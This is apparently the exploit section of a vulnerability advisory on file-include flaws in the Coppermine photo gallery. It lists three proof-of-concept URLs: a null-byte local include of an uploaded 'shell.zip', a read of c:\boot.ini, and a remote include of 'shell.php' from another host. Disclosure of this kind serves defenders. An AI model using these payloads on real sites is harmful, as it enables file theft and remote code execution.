• info
• discussion
• exploit
• solution
• references

Coppermine Multiple File Include Vulnerabilities


An exploit is not required.

Proof of concept examples are available:

http://www.example.com/[path]/thumbnails.php?lang=../albums/userpics/10002/shell.zip%00

http://www.example.com/[path]/docs/showdoc.php?f=c:\\boot.ini

http://www.example.com/[path]/docs/showdoc.php?f=\\\\192.168.1.2\\c\\shell.php

• /data/vulnerabilities/exploits/cpg_143_incl_xpl